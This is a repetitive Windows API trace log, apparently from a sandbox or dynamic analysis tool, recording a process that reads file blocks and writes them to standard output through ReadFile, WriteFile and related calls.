_get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] GetFileType (hFile=0x50) returned 0x1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.862] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.862] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.863] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.863] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] GetFileType (hFile=0x50) returned 0x1 [0142.863] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.863] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.864] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.864] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.864] GetFileType (hFile=0x50) returned 0x1 [0142.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.865] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.865] GetFileType (hFile=0x50) returned 0x1 [0142.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] GetFileType (hFile=0x50) returned 0x1 [0142.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.866] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.866] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] GetFileType (hFile=0x50) returned 0x1 [0142.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.867] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.868] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.868] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] GetFileType (hFile=0x50) returned 0x1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.868] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.869] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.869] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.870] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] GetFileType (hFile=0x50) returned 0x1 [0142.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.870] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] GetFileType (hFile=0x50) returned 0x1 [0142.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.871] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.871] _get_osfhandle (_FileHandle=4) returned 0x58 